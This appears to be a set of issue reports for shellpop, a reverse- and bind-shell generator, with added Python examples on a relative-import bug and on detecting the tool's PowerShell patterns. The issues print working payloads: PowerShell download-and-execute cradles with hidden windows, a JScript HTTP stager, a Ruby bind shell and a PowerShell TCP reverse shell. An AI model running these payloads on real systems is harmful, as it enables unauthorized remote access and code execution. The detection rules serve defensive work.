0x00-0x00 / shellpop
Pop shells like a master.
License: MIT License
Hello, congratulations on the tool, it is very good. I have some doubts: I used a PowerShell shell and the Metasploit framework with a handler. It appeared that I would get a Meterpreter session, but the terminal simply locked without opening the Meterpreter session. My doubt is whether it is possible to get the Meterpreter session with shellpop. Something else I think would be interesting is to put the -w hidden code into the PowerShell payloads to make them hidden after running.
Thanks.
Here is another shell creator script with some additional ways.
ShellPop is incompatible with python3 due to an indentation error in ./bin/shellpop.
$ python3 bin/shellpop
File "bin/shellpop", line 811
try:
^
TabError: inconsistent use of tabs and spaces in indentation
In Python and other interpreted-language projects, it is good practice to provide a setup routine, as an equivalent of the traditional make install.
Therefore, the installation (here, setup.py) should always be optional, and the user should be able to run the project as soon as it is cloned.
Most people like to test a tool before actually installing or packaging it into their system (this assertion is even more true for pentesters, who clone and test tools thousands of times per year).
After installing the requirements and running the setup, I still got an error!
Traceback (most recent call last):
File "/usr/local/bin/shellpop", line 4, in <module>
__import__('pkg_resources').run_script('shellpop==0.3.5', 'shellpop')
File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 765, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 1545, in run_script
exec(code, namespace, namespace)
File "/usr/local/lib/python3.6/dist-packages/shellpop-0.3.5-py3.6.egg/EGG-INFO/scripts/shellpop", line 30, in <module>
from shellpop import *
File "/usr/local/lib/python3.6/dist-packages/shellpop-0.3.5-py3.6.egg/shellpop/__init__.py", line 1, in <module>
from bind import *
ModuleNotFoundError: No module named 'bind'
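The "No module named 'bind'" failure in the traceback above is a Python 2 to Python 3 packaging problem rather than a missing dependency: "from bind import *" inside a package's __init__.py is an implicit relative import, which Python 2 resolves to the sibling file bind.py but Python 3 only looks up on sys.path as a top-level module. The following is an added example, not code from the shellpop project, that reproduces the failure with a throwaway package and shows the explicit relative form ("from .bind import *") that works on both interpreters. The package names and the bind_marker function are constructed for the demo.

```python
import importlib
import sys
import tempfile
from pathlib import Path


def try_import(init_body: str, pkg_name: str) -> str:
    """Create <tmp>/<pkg_name>/{__init__.py, bind.py} with the given
    __init__.py body, import the package, and return 'ok' when the sibling
    module was reached, otherwise the name of the ImportError subclass."""
    root = Path(tempfile.mkdtemp())
    pkg = root / pkg_name
    pkg.mkdir()
    # Stand-in for shellpop/bind.py (constructed; not the project's file).
    (pkg / "bind.py").write_text(
        "def bind_marker():\n    return 'sibling module loaded'\n"
    )
    (pkg / "__init__.py").write_text(init_body)
    sys.path.insert(0, str(root))
    importlib.invalidate_caches()
    try:
        mod = importlib.import_module(pkg_name)
        return "ok" if mod.bind_marker() == "sibling module loaded" else "unexpected"
    except ImportError as exc:  # ModuleNotFoundError is a subclass of ImportError
        return type(exc).__name__
    finally:
        sys.path.remove(str(root))
        sys.modules.pop(pkg_name, None)


def compare() -> dict:
    """Same package, two spellings of the import: the implicit form fails on
    Python 3 (assuming no top-level module named 'bind' is installed), the
    explicit relative form succeeds."""
    return {
        "implicit": try_import("from bind import *\n", "demo_pkg_implicit"),
        "explicit": try_import("from .bind import *\n", "demo_pkg_explicit"),
    }


if __name__ == "__main__":
    print(compare())
```

Running it under Python 3 reports ModuleNotFoundError for the implicit form and ok for the explicit one; under Python 2 both succeed, which is why the bug only surfaces once the tool is installed with a Python 3 setup.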
Powershell reverse-shell (number 22)
Command used:
--number 22 -H localhost -P 2323 --reverse --stager http
This will not work if the system is using a proxy. Taking a cue from Metasploit web delivery, we could include
powershell.exe -nop -w hidden -c $d=new-object net.webclient;$d.proxy=[Net.WebRequest]::GetSystemWebProxy();$d.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $d.downloadstring('<URL>');
instead of the current
powershell.exe -nop -ep bypass -Command 'iex (new-object system.net.webclient).downloadString(\"http://localhost:80/sfLkhXIg\")'
Hi there! I'm excited to use this. Thank you so much for your contribution to the community and hard work!!
Just getting started and noticed that a module was missing from requirements.
Traceback (most recent call last):
File "/usr/local/bin/shellpop", line 4, in <module>
__import__('pkg_resources').run_script('shellpop==0.3.5', 'shellpop')
File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 748, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 1517, in run_script
exec(code, namespace, namespace)
File "/usr/local/lib/python2.7/dist-packages/shellpop-0.3.5-py2.7.egg/EGG-INFO/scripts/shellpop", line 22, in <module>
import netifaces
ImportError: No module named netifaces
Hope this helps! Thanks again.
Hello, how can we hide all of the cmd windows that pop up when executing the below cmd.exe command?
$ shellpop --reverse --number 21 --host 192.168.1.55 --handler --base64 --powershell-random-case --stager http --http-port 2226 --port 3336
[+] Choose a stager:
1. CertUtil Windows HTTP Stager
2. VBScript Windows HTTP Stager
[+] Stager number: 2
[+] Started HTTP server at port 2226
[+] Staged file has been named 'SkHEjSdH'
[+] Execute this code in remote target:
cmd.exe /c "echo var H = new ActiveXObject("WinHttp.WinHttpRequest.5.1");H.Open("GET", "http://192.168.1.55:2226/SkHEjSdH", /*async=*/false);H.Send();B = new ActiveXObject("ADODB.Stream");B.Type = 1;B.Open();B.Write(H.ResponseBody);B.SaveToFile("SkHEjSdH.bat");S = new ActiveXObject("Wscript.Shell");S.run("SkHEjSdH.bat");" > SkHEjSdH.js && cmd.exe /c "cscript SkHEjSdH.js"
As I was going through all the bind shells, testing for an upcoming PR, I noticed that I could not get the linux/bind/tcp/ruby shell to work. Every time I ran it I got this error from sh:
ruby -rsocket -e 'f=TCPServer.new(1337);s=f.accept;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",s,s,s)'
sh: 1: 8: Bad file descriptor
From the looks of it, I'm guessing bash doesn't like f.accept as a file descriptor, but I'm not sure how to fix that. My Ruby knowledge is very little.
I've run into an issue with PowerShell reverse shell payloads 9 and 25 if generated as described below. Tested it on Windows 7 x86 and Windows 10 x64. It fails on both. I'm no PowerShell guru so I'm not sure how to fix it.
This is the execution output:
powershell.exe -nop -ep bypass -Command "$xDHvvVTgtya='xx.xx.xx.xx';$GYhNfQRZIEYm=xxx;$lDUkaAa=New-Object System.Net.Sockets.TCPClient($xDHvvVTgtya,$GYhNfQRZIEYm);$GcIjoaNgvqG=$lDUkaAa.GetStream();[byte[]]$SJsnAdmfrbsJLjF=0..65535|:ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);while(($kcoITwLMzujjdk=$GcIjoaNgvqG.Read($SJsnAdmfrbsJLjF,0,$SJsnAdmfrbsJLjF.Length)) -ne 0){$HQjgMvUcOUSKh=([text.encoding]::ASCII).GetString($SJsnAdmfrbsJLjF,0,$kcoITwLMzujjdk);try{$KDUugHGsudblDb=(Invoke-Expression -c $HQjgMvUcOUSKh 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$xDHvvVTgtya0=$KDUugHGsudblDb+'PS '+(Get-Location).Path+'> ';$xDHvvVTgtya1=($xDHvvVTgtya2[0]|Out-String);$xDHvvVTgtya2.clear();$xDHvvVTgtya0=$xDHvvVTgtya0+$xDHvvVTgtya1;$cPLlmQj=([text.encoding]::ASCII).GetBytes($xDHvvVTgtya0);$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);$GcIjoaNgvqG.Flush();};$lDUkaAa.Close();if($xDHvvVTgtya3){$xDHvvVTgtya3.Stop();};"
And the error on Win7:
Unexpected token ')' in expression or statement. $xDHvvVTgtya='192.168.247.129';$GYhNfQRZIEYm=4444;$lDUkaAa=New-Object System.Net.Sockets.TCPClient($xDHvvVTgtya,$GYhNfQRZIEYm);$GcIjoaNgvqG=$lDUkaAa.GetStream();[byte[]]$SJsnAdmfrbsJLjF=0..65535|:ASCII) <<<< .GetBytes('PS '+(Get-Location).Path+'> ');$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);while(($kcoITwLMzujjdk=$GcIjoaNgvqG.Read($SJsnAdmfrbsJLjF,0,$SJsnAdmfrbsJLjF.Length)) -ne 0){$HQjgMvUcOUSKh=([text.encoding]::ASCII).GetString($SJsnAdmfrbsJLjF,0,$kcoITwLMzujjdk);try{$KDUugHGsudblDb=(Invoke-Expression -c $HQjgMvUcOUSKh 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$xDHvvVTgtya0=$KDUugHGsudblDb+'PS '+(Get-Location).Path+'> ';$xDHvvVTgtya1=($xDHvvVTgtya2[0]|Out-String);$xDHvvVTgtya2.clear();$xDHvvVTgtya0=$xDHvvVTgtya0+$xDHvvVTgtya1;$cPLlmQj=([text.encoding]::ASCII).GetBytes($xDHvvVTgtya0);$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);$GcIjoaNgvqG.Flush();};$lDUkaAa.Close();if($xDHvvVTgtya3){$xDHvvVTgtya3.Stop();};
CategoryInfo : ParserError: ():String) [], ParentContainsErrorRecordException
FullyQualifiedErrorId : UnexpectedToken
Slightly different error, maybe more helpful, in Win10:
At line:1 char:196
... KX=$XnBJSVNr.GetStream();[byte[]]$GQrahNYaUV=0..65535|:ASCII).GetByte ...
~
Unexpected token ')' in expression or statement.
CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
FullyQualifiedErrorId : UnexpectedToken
Just my 2 cents:
The method number is the worst part of otherwise awesome code. If, instead of a number, the user could input something recognizable, like the language or an extension (say ps1 for PowerShell, php, aspx, asp, cmd, etc.), that would be more useful and quicker to remember and recall.
Thanks!
OS: Kali GNU/Linux Rolling
Python version: Python 2.7.15+
There seems to be a problem with the handler of reverse shell number 1.
The complete error is:
[+] Port Already used by another Program or Something Wrong... 2018 ./extras/c-ares-1.6.0/ares_gethostbyaddr.lo
Traceback (most recent call last):
File "/usr/local/bin/shellpop", line 858, in <module>
main()
File "/usr/local/bin/shellpop", line 840, in main
sys.exit()
NameError: global name 'sys' is not defined
The command I executed was:
$ shellpop --reverse --number 1 --handler --host xx.xx.xx.xx --port xxxx
It gave me an initial shell and, after executing find, I got this error and the shell closed.
I am available for any more info.
Thanks in advance
I've installed ShellPop in a venv on the latest Kali. I'm using a Python 2.7.18 venv.
After installing the requirements, I got an import error:
bin/shellpop --list
Traceback (most recent call last):
File "bin/shellpop", line 18, in <module>
import pyperclip
ImportError: No module named pyperclip
However, pyperclip is correctly installed !
Any ideas of a solution ?
Thanks !
The --powershell-x64 and --powershell-x86 arguments seem to prefix the wrong path to the payload. In fact, I believe they are reversed.
root@home:~# shellpop -H eth0 -P 1234 --powershell-x64 --reverse --number 9
[+] Execute this code in remote target:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [...]
root@home:~# shellpop -H eth0 -P 1234 --powershell-x86 --reverse --number 9
[+] Execute this code in remote target:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [...]
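The features reported across these issues (the -nop, -w hidden and -ep bypass switches, a downloadString cradle handed to IEX, cscript launching a dropped .js file, and PowerShell running from SysWOW64, which is the 32-bit host on a 64-bit system and is what the swapped --powershell-x86 path above selects) are also exactly what a defender looks for in process-creation telemetry. The following added example, not part of shellpop, runs a handful of such checks over constructed Sysmon-style process events. The sample events, the 192.0.2.10 address and the rule names are made up for the demo; a single weak indicator such as -NoProfile on its own is deliberately scored low because legitimate scheduled scripts use it too.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed Sysmon-style process-creation events (not real telemetry).
# Events 0-2 mirror the command lines quoted in the issues above; event 3 is
# a benign scheduled script included to show why weak indicators score low.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c $d=new-object net.webclient;"
                "IEX $d.downloadstring('http://192.0.2.10/x')"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -ep bypass -Command 'iex (new-object "
                "system.net.webclient).downloadString(\"http://192.0.2.10:80/sfLkhXIg\")'"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "cscript SkHEjSdH.js"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
]

I = re.IGNORECASE
# Download-and-execute cradle: a fetch primitive plus an evaluator in one line.
CRADLE_RE = re.compile(r"downloadstring|downloadfile|downloaddata|net\.webclient|invoke-webrequest", I)
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", I)
# PowerShell switch abbreviations the engine accepts (-w/-win/-windowstyle, etc.).
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden\b", I)
NOP_RE = re.compile(r"-(?:nop|noprofile)\b", I)
BYPASS_RE = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass\b", I)
# Windows Script Host running a script file (the .js dropper in the issue above).
SCRIPT_HOST_RE = re.compile(r"\b[wc]script(?:\.exe)?\s+\S+\.(?:js|jse|vbs|vbe)\b", I)
# 32-bit PowerShell image on a 64-bit host; checked on the image path, not the command line.
WOW64_PS_RE = re.compile(r"\\syswow64\\.*\\powershell\.exe$", I)

# (rule name, predicate over (image, cmdline)); evaluated in this order.
RULES: List[Tuple[str, Callable[[str, str], bool]]] = [
    ("download_cradle", lambda img, cmd: bool(CRADLE_RE.search(cmd) and IEX_RE.search(cmd))),
    ("hidden_window", lambda img, cmd: bool(HIDDEN_RE.search(cmd))),
    ("no_profile", lambda img, cmd: bool(NOP_RE.search(cmd))),
    ("policy_bypass", lambda img, cmd: bool(BYPASS_RE.search(cmd))),
    ("wow64_powershell", lambda img, cmd: bool(WOW64_PS_RE.search(img))),
    ("script_host_via_cmd", lambda img, cmd: bool(SCRIPT_HOST_RE.search(cmd))),
]
# Rules that are alert-worthy on their own; the rest only add up.
STRONG = {"download_cradle", "script_host_via_cmd"}


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules the event matches, in RULES order."""
    return [name for name, pred in RULES if pred(event["image"], event["cmdline"])]


def severity(matched: List[str]) -> str:
    """High on any strong indicator, medium on two or more weak ones,
    low on a single weak one, none otherwise."""
    if STRONG & set(matched):
        return "high"
    if len(matched) >= 2:
        return "medium"
    return "low" if matched else "none"


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Score every event and pair the severity with the matched rule names."""
    return [(severity(m), m) for m in map(score_event, events)]


if __name__ == "__main__":
    for ev, (sev, rules) in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{sev:6} {rules} <- {ev['cmdline'][:60]}")
```

The image-path check is the one to keep in mind from the x64/x86 issue: whichever label the tool prints, a PowerShell process whose image lives under SysWOW64 is the 32-bit engine, and on a 64-bit workstation that is unusual enough to be worth a weak-indicator score even when the command line looks clean.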